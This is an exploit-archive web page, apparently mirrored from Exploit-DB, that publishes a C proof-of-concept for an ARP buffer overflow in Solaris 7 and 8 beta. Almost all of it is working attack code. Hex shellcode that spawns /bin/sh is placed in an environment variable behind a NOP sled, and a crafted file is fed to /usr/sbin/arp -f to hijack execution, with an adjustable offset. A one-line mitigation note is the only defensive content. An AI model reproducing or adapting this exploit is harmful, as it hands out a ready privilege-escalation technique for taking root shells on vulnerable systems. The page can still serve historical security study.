Notice: Function _load_textdomain_just_in_time was called incorrectly. Translation loading for the wp-pagenavi domain was triggered too early. This is usually an indicator for some code in the plugin or theme running too early. Translations should be loaded at the init action or later. Please see Debugging in WordPress for more information. (This message was added in version 6.7.0.) in /home/u918112125/domains/exploit.company/public_html/wp-includes/functions.php on line 6114
ARP Overflow Proof of Concept - exploit.company
header-logo
Suggest Exploit
vendor:
by:
ahmed@securityfocus.com
7.5
CVSS
HIGH
ARP Overflow
CWE
Product Name:
Affected Version From: Solaris 7
Affected Version To: Solaris 8 beta
Patch Exists: NO
Related CWE: Not applicable
CPE:
Metasploit:
Other Scripts:
Platforms Tested: Solaris 7, Solaris 8 beta
2000

ARP Overflow Proof of Concept

This is a proof of concept for an ARP overflow vulnerability. The exploit code is designed to run shellcode written by Cheez Whiz. It has been tested on x86 Solaris 7 and 8 beta. The default settings should work, but if not, the offset can be adjusted by providing a command line argument.

Mitigation:

Apply the necessary patches provided by the vendor.
Source

Exploit-DB raw data:

/*
   arp overflow proof of concept by ahmed@securityfocus.com
   shellcode originally written by Cheez Whiz.

                              tested on x86 solaris 7,8beta
   default should work.  if not, arg1 = offset. +- by 100's

   Copyright Security-Focus.com, 11/2000
*/

long get_esp() { __asm__("movl %esp,%eax"); }

int main(int ac, char **av)
{
  char shell[] =
    "\xeb\x45\x9a\xff\xff\xff\xff\x07\xff"
    "\xc3\x5e\x31\xc0\x89\x46\xb7\x88\x46"
    "\xbc\x88\x46\x07\x89\x46\x0c\x31\xc0"
    "\xb0\x2f\xe8\xe0\xff\xff\xff\x52\x52"
    "\x31\xc0\xb0\xcb\xe8\xd5\xff\xff\xff"
    "\x83\xc4\x08\x31\xc0\x50\x8d\x5e\x08"
    "\x53\x8d\x1e\x89\x5e\x08\x53\xb0\x3b"
    "\xe8\xbe\xff\xff\xff\x83\xc4\x0c\xe8"
    "\xbe\xff\xff\xff\x2f\x62\x69\x6e\x2f"
    "\x73\x68\xff\xff\xff\xff\xff\xff\xff"
    "\xff\xff";

  unsigned long magic = 0x8047b78;
  unsigned long r = get_esp() + 600;
  unsigned char buf[300];
  int f;

  if (ac == 2)
    r += atoi(av[1]);

  memset(buf,0x61,sizeof(buf));
  memcpy(buf+52,&magic,4);
  memcpy(buf+76,&r,4);

  f = open("/tmp/ypx",O_CREAT|O_WRONLY,0600);
  write(f,"1 2 3 4 ",8);
  write(f,buf,sizeof(buf));
  close(f);

  memset(buf,0x90,sizeof(buf));
  memcpy(buf,"LOL=",4);
  memcpy(buf+(sizeof(buf)-strlen(shell)),shell,strlen(shell));
  putenv(buf);

  system("/usr/sbin/arp -f /tmp/ypx");
  unlink("/tmp/ypx");
}


// milw0rm.com [2001-01-15]

Navigation

Suggest Exploit

Services By CQR